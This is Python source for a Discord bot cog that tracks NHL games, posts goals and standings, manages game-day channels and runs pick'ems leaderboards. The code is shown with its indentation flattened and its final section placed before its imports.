"""
Resets the bots game data incase something goes wrong
"""
all_teams = await self.config.teams()
for team in await self.config.teams():
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await ctx.send(_("Saved game data reset."))
@gdc.command()
@checks.is_owner()
async def setcreated(self, ctx, created: bool):
"""
Sets whether or not the game day channels have been created
"""
await self.config.created_gdc.set(created)
await ctx.send(_("created_gdc set to ") + str(created))
@gdc.command()
@checks.is_owner()
async def cleargdc(self, ctx):
"""
Checks for manually deleted channels from the GDC channel list
and removes them
"""
guild = ctx.message.guild
good_channels = []
for channels in await self.config.guild(guild).gdc():
channel = self.bot.get_channel(channels)
if channel is None:
await self.config._clear_scope(Config.CHANNEL, str(channels))
log.info("Removed the following channels" + str(channels))
continue
else:
good_channels.append(channel.id)
await self.config.guild(guild).gdc.set(good_channels)
@hockeyset_commands.command()
@checks.is_owner()
async def clear_broken_channels(self, ctx):
"""
Removes missing channels from the config
"""
for channels in await self.config.all_channels():
channel = self.bot.get_channel(channels)
if channel is None:
await self.config._clear_scope(Config.CHANNEL, str(channels))
log.info("Removed the following channels" + str(channels))
continue
# if await self.config.channel(channel).to_delete():
# await self.config._clear_scope(Config.CHANNEL, str(channels))
await ctx.send(_("Broken channels removed"))
@hockeyset_commands.command()
@checks.is_owner()
async def remove_broken_guild(self, ctx):
"""
Removes a server that no longer exists on the bot
"""
all_guilds = await self.config.all_guilds()
for guilds in await self.config.all_guilds():
guild = self.bot.get_guild(guilds)
if guild is None:
await self.config._clear_scope(Config.GUILD, str(guilds))
else:
if not await self.config.guild(guild).create_channels():
await self.config.guild(guild).gdc.set([])
await ctx.send(_("Saved servers the bot is no longer on have been removed."))
@hockeyset_commands.command()
@checks.is_owner()
async def clear_weekly(self, ctx):
"""
Clears the weekly tracker on the current servers pickems
May not be necessary anymore
"""
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard is None:
leaderboard = {}
for user in leaderboard:
leaderboard[str(user)]["weekly"] = 0
await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
@hockey_commands.command(hidden=True)
@checks.is_owner()
async def lights(self, ctx):
"""
Tests the philips Hue light integration
This is hard coded at the moment with no plans to make work generally
this will be safely ignored.
"""
if not LIGHTS_SET:
hue = Oilers(self.bot)
await hue.goal_lights()
else:
return
@hockeyset_commands.command()
@checks.is_owner()
async def testloop(self, ctx):
"""
Toggle the test game loop
"""
if not self.TEST_LOOP:
self.TEST_LOOP = True
else:
self.TEST_LOOP = False
await ctx.send(_("Test loop set to ") + str(self.TEST_LOOP))
@hockeyset_commands.command()
@checks.is_owner()
async def rempickem(self, ctx):
"""
Clears the servers current pickems object list
"""
await self.config.guild(ctx.guild).pickems.set([])
await ctx.send(_("All pickems removed on this server."))
@hockeyset_commands.command()
@checks.is_owner()
async def remleaderboard(self, ctx):
"""
Clears the servers pickems leaderboard
"""
await self.config.guild(ctx.guild).leaderboard.set({})
await ctx.send(_("Server leaderboard reset."))
def __unload(self):
self.bot.loop.create_task(self.session.close())
if getattr(self, "loop", None) is not None:
self.loop.cancel()
__del__ = __unload
| import discord
import aiohttp
import asyncio
import json
import yaml
import logging
from datetime import datetime, timedelta
from io import BytesIO
from urllib.parse import quote
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
from redbot.core.i18n import Translator, cog_i18n
from .teamentry import TeamEntry
from .menu import hockey_menu
from .embeds import *
from .helper import *
from .errors import *
from .game import Game
from .pickems import Pickems
from .standings import Standings
from .gamedaychannels import GameDayChannels
from .constants import *
try:
from .oilers import Oilers
LIGHTS_SET = True
except:
LIGHTS_SET = False
pass
_ = Translator("Hockey", __file__)
log = logging.getLogger("red.Hockey")
__version__ = "2.3.2"
__author__ = "TrustyJAID"
@cog_i18n(_)
class Hockey(getattr(commands, "Cog", object)):
"""
Gather information and post goal updates for NHL hockey teams
"""
def __init__(self, bot):
self.bot = bot
self.session = aiohttp.ClientSession(loop=self.bot.loop)
default_global = {"teams": [], "created_gdc": False, "print": False}
for team in TEAMS:
team_entry = TeamEntry("Null", team, 0, [], {}, [], "")
default_global["teams"].append(team_entry.to_json())
default_global["teams"].append(team_entry.to_json())
default_guild = {
"standings_channel": None,
"standings_type": None,
"post_standings": False,
"standings_msg": None,
"create_channels": False,
"category": None,
"gdc_team": None,
"gdc": [],
"delete_gdc": True,
"rules": "",
"team_rules": "",
"pickems": [],
"leaderboard": {},
}
default_channel = {"team": [], "to_delete": False}
self.config = Config.get_conf(self, CONFIG_ID)
self.config.register_global(**default_global, force_registration=True)
self.config.register_guild(**default_guild)
self.config.register_channel(**default_channel)
self.loop = bot.loop.create_task(self.game_check_loop())
self.TEST_LOOP = False # used to test a continuous loop of a single game data
##############################################################################
# Here is all the logic for gathering game data and updating information
async def game_check_loop(self):
"""
This loop grabs the current games for the day
then passes off to other functions as necessary
"""
await self.bot.wait_until_ready()
while self is self.bot.get_cog("Hockey"):
# await self.refactor_data()
async with self.session.get(BASE_URL + "/api/v1/schedule") as resp:
data = await resp.json()
if data["dates"] != []:
games = [
game["link"]
for game in data["dates"][0]["games"]
if game["status"]["abstractGameState"] != "Final"
]
else:
games = []
# Only try to create game day channels if there's no games for the day
# Otherwise make the game day channels once we see
# the first preview message to delete old ones
await self.check_new_day()
games_playing = False
if self.TEST_LOOP:
games = [1]
while games != []:
to_remove = []
games_playing = True
for link in games:
if not self.TEST_LOOP:
try:
async with self.session.get(BASE_URL + link) as resp:
data = await resp.json()
except Exception as e:
log.error(_("Error grabbing game data: "), exc_info=True)
continue
else:
games_playing = False
with open(str(__file__)[:-9] + "testgame.json", "r") as infile:
data = json.loads(infile.read())
game = await Game.from_json(data)
try:
await self.check_new_day()
await game.check_game_state(self.bot)
except Exception as e:
log.error("Error checking game state: ", exc_info=True)
log.debug(
(
f"{game.away_team} @ {game.home_team} "
f"{game.game_state} {game.away_score} - {game.home_score}"
)
)
if game.game_state == "Final" and game.first_star is not None:
try:
await Pickems.set_guild_pickem_winner(self.bot, game)
except Exception as e:
log.error(_("Pickems Set Winner error: "), exc_info=True)
to_remove.append(link)
for link in to_remove:
games.remove(link)
await asyncio.sleep(60)
log.debug(_("Games Done Playing"))
try:
await Pickems.tally_leaderboard(self.bot)
except Exception as e:
log.error(_("Error tallying leaderboard:"), exc_info=True)
pass
if games_playing:
await self.config.created_gdc.set(False)
# Final cleanup of config incase something went wrong
# Should be mostly unnecessary at this point
all_teams = await self.config.teams()
for team in await self.config.teams():
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await asyncio.sleep(300)
async def check_new_day(self):
if not await self.config.created_gdc():
if datetime.now().weekday() == 6:
try:
await Pickems.reset_weekly(self.bot)
except Exception as e:
log.error(_("Error reseting the weekly leaderboard: "), exc_info=True)
try:
await Standings.post_automatic_standings(self.bot)
except Exception as e:
log.error("Error updating standings", exc_info=True)
log.debug(_("Checking GDC"))
await GameDayChannels.check_new_gdc(self.bot)
await self.config.created_gdc.set(True)
async def on_raw_reaction_add(self, payload):
channel = self.bot.get_channel(id=payload.channel_id)
try:
guild = channel.guild
except:
return
pickems_list = await self.config.guild(guild).pickems()
if pickems_list is None:
return
pickems = [Pickems.from_json(p) for p in pickems_list]
if len(pickems) == 0:
return
try:
msg = await channel.get_message(id=payload.message_id)
except:
return
user = guild.get_member(payload.user_id)
# log.debug(payload.user_id)
if user.bot:
return
is_pickems_vote = False
for pickem in pickems:
if msg.id in pickem.message:
is_pickems_vote = True
reply_message = ""
try:
# log.debug(payload.emoji)
pickem.add_vote(user.id, payload.emoji)
except UserHasVotedError as team:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
emoji = (
pickem.home_emoji
if str(payload.emoji.id) in pickem.away_emoji
else pickem.away_emoji
)
await msg.remove_reaction(emoji, user)
reply_message = _("You have already voted! Changing vote to) ") + str(team)
except VotingHasEndedError as error_msg:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Voting has ended!") + str(error_msg)
except NotAValidTeamError:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Don't clutter the voting message with emojis!")
if reply_message != "":
try:
await user.send(reply_message)
except:
pass
if is_pickems_vote:
pickems_list = [p.to_json() for p in pickems]
await self.config.guild(guild).pickems.set(pickems_list)
async def change_custom_emojis(self, attachments):
"""
This overwrites the emojis in constants.py
with values in a properly formatted .yaml file
"""
try:
async with self.session.get(attachments[0].url) as infile:
data = yaml.safe_load(await infile.read())
except yaml.error.YAMLError as exc:
raise InvalidFileError("Error Parsing the YAML") from exc
new_dict = {}
for team in TEAMS:
TEAMS[team]["emoji"] = data[team][0] if data[team][0] is not None else data["Other"][0]
team_data = json.dumps(TEAMS, indent=4, sort_keys=True, separators=(",", " : "))
constants_string = (
f'BASE_URL = "{BASE_URL}"\n'
f'HEADSHOT_URL = "{HEADSHOT_URL}"\n'
f"CONFIG_ID = {CONFIG_ID}\n"
f"TEAMS = {team_data}"
)
with open(__file__[:-9] + "constants.py", "w") as outfile:
outfile.write(constants_string)
async def wait_for_file(self, ctx):
"""
Waits for the author to upload a file
"""
msg = None
while msg is None:
check = lambda m: m.author == ctx.message.author and m.attachments != []
try:
msg = await self.bot.wait_for("message", check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send(_("Emoji changing cancelled"))
break
if msg.content.lower().strip() == "exit":
await ctx.send(_("Emoji changing cancelled"))
break
return msg
##############################################################################
# Here are all the bot commands
@commands.group(name="hockey", aliases=["nhl"])
async def hockey_commands(self, ctx):
"""
Get information from NHL.com
"""
pass
@commands.group(name="hockeyset", aliases=["nhlset"])
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def hockeyset_commands(self, ctx):
"""
Setup commands for the server
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
standings_channel = guild.get_channel(
await self.config.guild(guild).standings_channel()
)
post_standings = (
_("On") if await self.config.guild(guild).post_standings() else _("Off")
)
gdc_channels = await self.config.guild(guild).gdc()
if standings_channel is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_chn = standings_channel.mention
else:
standings_chn = standings_channel.name
try:
standings_msg = await standings_channel.get_message(
await self.config.guild(guild).standings_msg()
)
except discord.errors.NotFound:
standings_msg = None
pass
if standings_msg is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_msg = (
_("[Standings") + f" {post_standings}]({standings_msg.jump_url})"
)
else:
standings_msg = (
_("Standings") + f" {post_standings}```{standings_msg.jump_url}"
)
else:
standings_chn = "None"
standings_msg = "None"
channels = ""
for channel in await self.config.all_channels():
chn = guild.get_channel(channel)
if chn is not None:
teams = ", ".join(t for t in await self.config.channel(chn).team())
is_gdc = "(GDC)" if chn.id in gdc_channels else ""
if ctx.channel.permissions_for(guild.me).embed_links:
channels += f"{chn.mention}{is_gdc}: {teams}\n"
else:
channels += f"#{chn.name}{is_gdc}: {teams}\n"
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=guild.name + _(" Hockey Settings"))
em.colour = await self.bot.db.color()
em.description = channels
em.add_field(
name=_("Standings Settings"), value=f"{standings_chn}: {standings_msg}"
)
await ctx.send(embed=em)
else:
msg = (
f"```\n{guild.name} "
+ _("Hockey Settings\n")
+ f"{channels}\n"
+ _("Standings Settings")
+ "\n#{standings_chn}: {standings_msg}"
)
if standings_msg is not None:
await ctx.send(msg)
else:
await ctx.send(msg + "```")
@commands.group()
@checks.mod_or_permissions(manage_channels=True)
@commands.guild_only()
async def gdc(self, ctx):
"""
Game Day Channel setup for the server
You can setup only a single team or all teams for the server
Game day channels are deleted and created on the day after the game is played
usually around 9AM PST
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
create_channels = await self.config.guild(guild).create_channels()
if create_channels is None:
return
team = await self.config.guild(guild).gdc_team()
if team is None:
team = "None"
channels = await self.config.guild(guild).gdc()
category = self.bot.get_channel(await self.config.guild(guild).category())
delete_gdc = await self.config.guild(guild).delete_gdc()
if category is not None:
category = category.name
if channels is not None:
created_channels = ""
for channel in channels:
chn = self.bot.get_channel(channel)
if chn is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
created_channels += chn.mention
else:
created_channels += "#" + chn.name
else:
created_channels += "<#{}>\n".format(channel)
if len(channels) == 0:
created_channels = "None"
else:
created_channels = "None"
if not ctx.channel.permissions_for(guild.me).embed_links:
msg = (
_("```GDC settings for")
+ guild.name
+ "\n"
+ _("Create Game Day Channels:")
+ create_channels
+ "\n"
+ _("Delete Game Day Channels: ")
+ delete_gdc
+ "\n"
+ _("Team:")
+ team
+ "\n"
+ _("Current Channels:")
+ created_channels
+ "```"
)
await ctx.send(msg)
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=_("GDC settings for ") + guild.name)
em.colour = await self.bot.db.color()
em.add_field(name=_("Create Game Day Channels"), value=str(create_channels))
em.add_field(name=_("Delete Game Day Channels"), value=str(delete_gdc))
em.add_field(name=_("Team"), value=str(team))
em.add_field(name=_("Current Channels"), value=created_channels)
await ctx.send(embed=em)
#######################################################################
# All Game Day Channel Commands
@gdc.command(name="delete")
async def gdc_delete(self, ctx):
"""
Delete all current game day channels for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.delete_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels deleted."))
@gdc.command(name="create")
async def gdc_create(self, ctx):
"""
Creates the next gdc for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.create_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels created."))
@gdc.command(name="toggle")
async def gdc_toggle(self, ctx):
"""
Toggles the game day channel creation on this server
"""
guild = ctx.message.guild
cur_setting = not await self.config.guild(guild).create_channels()
verb = _("will") if cur_setting else _("won't")
msg = _("Game day channels ") + verb + _(" be created on this server.")
await self.config.guild(guild).create_channels.set(cur_setting)
await ctx.send(msg)
@gdc.command(name="category")
async def gdc_category(self, ctx, category: discord.CategoryChannel):
"""
Change the category for channel creation. Channel is case sensitive.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).category()
msg = _("Game day channels will be created in ")
await self.config.guild(guild).category.set(category.id)
await ctx.send(msg + category.name)
@gdc.command(name="autodelete")
async def gdc_autodelete(self, ctx):
"""
Toggle's auto deletion of game day channels.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).delete_gdc()
verb = _("won't") if cur_setting else _("will")
msg = (
_("Game day channels ")
+ verb
+ _(" be deleted on this server.\n")
+ _("Note, this may not happen until the next set of games.")
)
await self.config.guild(guild).delete_gdc.set(not cur_setting)
await ctx.send(msg)
@gdc.command(name="setup")
async def gdc_setup(
self,
ctx,
team: HockeyTeams,
category: discord.CategoryChannel = None,
delete_gdc: bool = True,
):
"""
Setup game day channels for a single team or all teams
Required parameters:
`team` must use quotes if a space is in the name will search for partial team name
Optional Parameters:
`category` must use quotes if a space is in the name will default to current category
`delete_gdc` will tell the bot whether or not to delete game day channels automatically
must be either `True` or `False` and a category must be provided
"""
guild = ctx.message.guild
if guild is None:
await ctx.send("This needs to be done in a server.")
return
if category is None:
category = guild.get_channel(ctx.message.channel.category_id)
if not category.permissions_for(guild.me).manage_channels:
await ctx.send(_("I don't have manage channels permission!"))
return
await self.config.guild(guild).category.set(category.id)
await self.config.guild(guild).gdc_team.set(team)
await self.config.guild(guild).delete_gdc.set(delete_gdc)
if team.lower() != "all":
await GameDayChannels.create_gdc(self.bot, guild)
else:
game_list = await Game.get_games()
for game in game_list:
await GameDayChannels.create_gdc(self.bot, guild, game)
await ctx.send(_("Game Day Channels for ") + team + _("setup in ") + category.name)
#######################################################################
# All Hockey setup commands
@hockeyset_commands.command()
@checks.admin_or_permissions(administrator=True)
async def reset(self, ctx):
"""
Restarts the hockey loop incase there are issues with the posts
"""
msg = await ctx.send(_("Restarting..."))
self.loop.cancel()
await msg.edit(content=msg.content + _("loop closed..."))
self.loop = self.bot.loop.create_task(self.game_check_loop())
await msg.edit(content=msg.content + _("restarted"))
# await ctx.send("Done.")
@hockeyset_commands.command(hidden=True)
async def leaderboardset(
self, ctx, user: discord.Member, season: int, weekly: int = None, total: int = None
):
"""
Allows moderators to set a users points on the leaderboard
"""
if weekly is None:
weekly = season
if total is None:
total = season
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if str(user.id) not in leaderboard:
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
else:
del leaderboard[str(user.id)]
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
msg = (
user.display_name
+ _(" now has ")
+ season
+ _(" points on the season, ")
+ weekly
+ _(" points for the week,")
+ _(" and ")
+ total
+ _(" votes overall.")
)
await ctx.send(msg)
@hockeyset_commands.command(name="poststandings", aliases=["poststanding"])
async def post_standings(self, ctx, standings_type: str, channel: discord.TextChannel = None):
"""
Posts automatic standings when all games for the day are done
`standings_type` can be a division, conference, team, or all
`channel` will default to the current channel or be specified
"""
guild = ctx.message.guild
if channel is None:
channel = ctx.message.channel
standings_list = [
"metropolitan",
"atlantic",
"pacific",
"central",
"eastern",
"western",
"all",
]
division = ["metropolitan", "atlantic", "pacific", "central"]
if standings_type.lower() not in standings_list:
await ctx.send(
_("You must choose from ") + "{}".format(", ".join(s for s in standings_list))
)
return
standings, page = await Standings.get_team_standings(standings_type.lower())
if standings_type.lower() != "all":
em = await Standings.build_standing_embed(standings, page)
else:
em = await Standings.all_standing_embed(standings, page)
await self.config.guild(guild).standings_type.set(standings_type)
await self.config.guild(guild).standings_channel.set(channel.id)
await ctx.send(_("Sending standings to") + channel.mention)
message = await channel.send(embed=em)
await self.config.guild(guild).standings_msg.set(message.id)
await ctx.send(
standings_type
+ _(" standings will now be automatically updated in ")
+ channel.mention
)
await self.config.guild(guild).post_standings.set(True)
@hockeyset_commands.command()
async def togglestandings(self, ctx):
"""
Toggles automatic standings updates
This updates at the same time as the game day channels (usually 9AM PST)
"""
guild = ctx.message.guild
cur_state = not await self.config.guild(guild).post_standings()
verb = _("will") if cur_state else _("won't")
msg = _("Okay, standings ") + verb + _("be updated automatically.")
await self.config.guild(guild).post_standings.set(cur_state)
await ctx.send(msg)
@hockeyset_commands.command(name="add", aliases=["add_goals"])
async def add_goals(self, ctx, team: HockeyTeams, channel: discord.TextChannel = None):
"""
Adds a hockey team goal updates to a channel do 'all' for all teams
`team` needs to be all or part of an NHL team if more than one team
match it will ask for the correct team.
`channel` defaults to the current channel
"""
guild = ctx.message.guild
# team_data = await self.get_team(team)
if channel is None:
channel = ctx.message.channel
if not channel.permissions_for(guild.me).embed_links:
await ctx.send(_("I don't have embed links permission!"))
return
cur_teams = await self.config.channel(channel).team()
cur_teams = [] if cur_teams is None else cur_teams
if team in cur_teams:
await self.config.channel(channel).team.set([team])
else:
cur_teams.append(team)
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goals will be posted in ") + channel.mention)
@hockeyset_commands.command(name="del", aliases=["remove", "rem"])
async def remove_goals(
self, ctx, team: HockeyTeams = None, channel: discord.TextChannel = None
):
"""
Removes a teams goal updates from a channel
defaults to the current channel
"""
if channel is None:
channel = ctx.message.channel
cur_teams = await self.config.channel(channel).team()
if cur_teams is None:
await ctx.send(_("no teams are currently being posted in ") + channel.mention)
return
if team is None:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
return
if team is not None:
guild = ctx.message.guild
if team in cur_teams:
cur_teams.remove(team)
if cur_teams == []:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
else:
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goal updates removed from ") + channel.mention)
#######################################################################
# All Basic Hockey Commands
@hockey_commands.command()
async def version(self, ctx):
"""
Display the current version
"""
await ctx.send(_("Hockey version ") + __version__)
@commands.command()
async def hockeyhub(self, ctx, *, search: str):
"""
Search for hockey related items on https://hockeyhub.github.io/
lines team Team lines on Daily Faceoff
stats [year] team Team stats on nhl.com, year optional
schedule team Team schedule on nhl.com
draft team oryear Draft history for team or year on Elite Prospects
cap team orplayer Cap information for team or player on CapFriendly
player player Search for player on Elite Prospects
depth team Team depth chart on Elite Prospects
prospects team Team prospects on Elite Prospects
trades team Team trade history on NHL Trade Tracker
jersey [team] number orname Find a player by jersey number
highlights [team] Game Highlights, team optional
reddit team Team subreddit on Reddit
"""
search = quote(search)
await ctx.send("https://hockeyhub.github.io/?search=" + search)
@hockey_commands.command(name="role")
async def team_role(self, ctx, *, team: HockeyTeams):
"""Set your role to a team role"""
guild = ctx.message.guild
if not guild.me.guild_permissions.manage_roles:
return
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and "GOAL" not in role.name)
]
await ctx.author.add_roles(role[0])
await ctx.send(role[0].name + _("role applied."))
except Exception as e:
log.error("error adding team role", exc_info=True)
await ctx.send(team + _(" is not an available role!"))
@hockey_commands.command(name="goals")
async def team_goals(self, ctx, *, team: HockeyTeams = None):
"""Subscribe to goal notifications"""
guild = ctx.message.guild
member = ctx.message.author
if not guild.me.guild_permissions.manage_roles:
return
if team is None:
team_roles = []
for role in guild.roles:
if role.name in [r.name + " GOAL" for r in member.roles]:
team_roles.append(role)
if team_roles != []:
for role in team_roles:
await ctx.message.author.add_roles(role)
role_list = ", ".join(r.name for r in team_roles)
await ctx.message.channel.send(f"{role_list} role applied.")
return
else:
return
else:
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and role.name.endswith("GOAL"))
]
await ctx.message.author.add_roles(role[0])
await ctx.message.channel.send(role[0].name + _(" role applied."))
except Exception as e:
await ctx.message.channel.send(team + _(" is not an available role!"))
@hockey_commands.command()
async def standings(self, ctx, *, search: HockeyStandings = None):
"""
Displays current standings
If a search is provided you can see a teams complete stats
by searching for team or get all standings at once
separated by division
"""
if search is None:
standings, page = await Standings.get_team_standings("division")
await hockey_menu(ctx, "standings", standings)
return
standings, page = await Standings.get_team_standings(search.lower())
if search != "all":
await hockey_menu(ctx, "standings", standings, None, page)
else:
await hockey_menu(ctx, "all", standings, None, page)
@hockey_commands.command(aliases=["score"])
async def games(self, ctx, *, team: HockeyTeams = None):
"""
Gets all NHL games for the current season
If team is provided it will grab that teams schedule
"""
games_list = []
page_num = 0
today = datetime.now()
start_date = datetime.strptime(f"{get_season()[0]}-9-1", "%Y-%m-%d")
games_list = await Game.get_games_list(team, start_date)
for game in games_list:
game_time = datetime.strptime(game["gameDate"], "%Y-%m-%dT%H:%M:%SZ")
if game_time >= today:
page_num = games_list.index(game)
break
if games_list != []:
await hockey_menu(ctx, "game", games_list, None, page_num)
else:
await ctx.message.channel.send(team + _(" have no recent or upcoming games!"))
@hockey_commands.command(aliases=["player"])
async def players(self, ctx, *, search):
"""
Search for a player or get a team roster
"""
rosters = {}
players = []
teams = [team for team in TEAMS if search.lower() in team.lower()]
if teams != []:
for team in teams:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]['id']}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
for player in data["roster"]:
players.append(player)
else:
for team in TEAMS:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]['id']}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
try:
rosters[team] = data["roster"]
except KeyError:
pass
for team in rosters:
for player in rosters[team]:
if search.lower() in player["person"]["fullName"].lower():
players.append(player)
if players != []:
await hockey_menu(ctx, "roster", players)
else:
await ctx.send(search + _(" is not an NHL team or Player!"))
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def rules(self, ctx):
"""
Display a nice embed of server specific rules
"""
if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
return
rules = await self.config.guild(ctx.guild).rules()
team = await self.config.guild(ctx.guild).team_rules()
if rules == "":
return
em = await make_rules_embed(ctx.guild, team, rules)
if ctx.channel.permissions_for(ctx.guild.me).manage_messages:
await ctx.message.delete()
await ctx.send(embed=em)
@hockey_commands.command(hidden=True)
@checks.admin_or_permissions(manage_messages=True)
async def pickems_page(self, ctx, date: str = None):
"""
Generates a pickems page for voting on a specified day must be "DD-MM-YYYY"
"""
if date is None:
date = datetime.now()
else:
date = datetime.strptime(date, "%d-%m-%Y")
msg = _(
"**Welcome to our daily Pick'ems challenge! Below you will see today's games!"
" Vote for who you think will win! You get one point for each correct prediction."
" We will be tracking points over the course of the season and will be rewarding weekly,"
" worst and full-season winners!**\n\n"
"- Click the reaction for the team you think will win the day's match-up.\n"
"- Anyone who votes for both teams will have their vote removed and will receive no points!\n\n\n\n"
)
games_list = await Game.get_games(None, date, date)
await ctx.send(msg)
for game in games_list:
new_msg = await ctx.send(
"__**{} {}**__ @ __**{} {}**__".format(
game.away_emoji, game.away_team, game.home_emoji, game.home_team
)
)
# Create new pickems object for the game
await Pickems.create_pickem_object(ctx.guild, new_msg, ctx.channel, game)
if ctx.channel.permissions_for(ctx.guild.me).add_reactions:
try:
await new_msg.add_reaction(game.away_emoji[2:-1])
await new_msg.add_reaction(game.home_emoji[2:-1])
except Exception as e:
log.debug("Error adding reactions")
async def post_leaderboard(self, ctx, leaderboard_type):
"""
Posts the leaderboard based on specific style
"""
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if leaderboard_type != "worst":
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1][leaderboard_type], reverse=True
)
else:
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1]["total"] - i[1]["season"], reverse=True
)
msg_list = []
count = 1
user_position = None
for member_id in leaderboard:
if str(member_id[0]) == str(ctx.author.id):
user_position = leaderboard.index(member_id)
member = ctx.guild.get_member(int(member_id[0]))
if member is None:
member_mention = _("User has left the server ") + member_id[0]
else:
member_mention = member.mention
if leaderboard_type == "weekly":
points = member_id[1]["weekly"]
msg_list.append("#{}. {}: {}\n".format(count, member_mention, points))
elif leaderboard_type == "season":
total = member_id[1]["total"]
wins = member_id[1]["season"]
percent = (wins / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {wins}/{total} correct ({percent:.4}%)\n"
)
else:
total = member_id[1]["total"]
losses = member_id[1]["total"] - member_id[1]["season"]
percent = (losses / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {losses}/{total} incorrect ({percent:.4}%)\n"
)
count += 1
leaderboard_list = [msg_list[i : i + 10] for i in range(0, len(msg_list), 10)]
if user_position is not None:
user = leaderboard[user_position][1]
wins = user["season"]
total = user["total"]
losses = user["total"] - user["season"]
position = (
ctx.author.display_name
+ _(", you're #")
+ str(user_position + 1)
+ " on the "
+ leaderboard_type
+ _(" leaderboard!")
)
if leaderboard_type == "season":
percent = (wins / total) * 100
position += (
_(" You have ") + f"{wins}/{total} " + _("correct ") + f"({percent:.4}%)."
)
elif leaderboard_type == "worst":
percent = (losses / total) * 100
position += (
_(" You have ") + f"{losses}/{total} " + _("incorrect ") + f"({percent:.4}%)."
)
await ctx.send(position)
await hockey_menu(ctx, leaderboard_type, leaderboard_list)
@hockey_commands.command()
@commands.guild_only()
async def leaderboard(self, ctx, leaderboard_type: str = "seasonal"):
"""
Shows the current server leaderboard either seasonal or weekly
"""
if leaderboard_type in ["seasonal", "season"]:
await self.post_leaderboard(ctx, "season")
if leaderboard_type in ["weekly", "week"]:
await self.post_leaderboard(ctx, "weekly")
if leaderboard_type in ["worst"]:
await self.post_leaderboard(ctx, "worst")
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def setrules(self, ctx, team: HockeyTeams, *, rules):
"""Set the main rules page for the nhl rules command"""
if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
await ctx.send(_("I don't have embed links permission!"))
return
await self.config.guild(ctx.guild).rules.set(rules)
await self.config.guild(ctx.guild).team_rules.set(team)
em = await make_rules_embed(ctx.guild, team, rules)
await ctx.send(_("Done, here's how it will look."), embed=em)
@hockey_commands.command(aliases=["link", "invite"])
async def otherdiscords(self, ctx, team: HockeyTeams):
"""
Get team specific discord links
choosing all will create a nicely formatted list of
all current NHL team discord server links
"""
if team not in ["all"]:
await ctx.send(TEAMS[team]["invite"])
else:
if not ctx.channel.permissions_for(ctx.message.author).manage_messages:
# Don't need everyone spamming this command
return
atlantic = [team for team in TEAMS if TEAMS[team]["division"] == "Atlantic"]
metropolitan = [team for team in TEAMS if TEAMS[team]["division"] == "Metropolitan"]
central = [team for team in TEAMS if TEAMS[team]["division"] == "Central"]
pacific = [team for team in TEAMS if TEAMS[team]["division"] == "Pacific"]
team_list = {
"Atlantic": atlantic,
"Metropolitan": metropolitan,
"Central": central,
"Pacific": pacific,
}
msg1 = _(
"__**Hockey Discord Master List**__\n```fix\n"
"- Do not join other discords to troll.\n- "
"Respect their rules & their members (Yes even the leafs & habs unfortunately).\n- "
"We don't control the servers below. If you get banned we can not get you unbanned.\n- "
"Don't be an asshole because then we all look like assholes. They won't see it as one asshole "
"fan they will see it as a toxic fanbase.\n- Salt levels may vary. Your team is the best "
"here but don't go on another discord and preach it to an angry mob after we just won.\n- "
"Not following the above rules will result in appropriate punishments ranging from a warning"
"to a ban. ```\n\nhttps://discord.gg/reddithockey"
)
eastern_conference = "https://i.imgur.com/CtXvcCs.png"
western_conference = "https://i.imgur.com/UFYJTDF.png"
async with self.session.get(eastern_conference) as resp:
data = await resp.read()
logo = BytesIO()
logo.write(data)
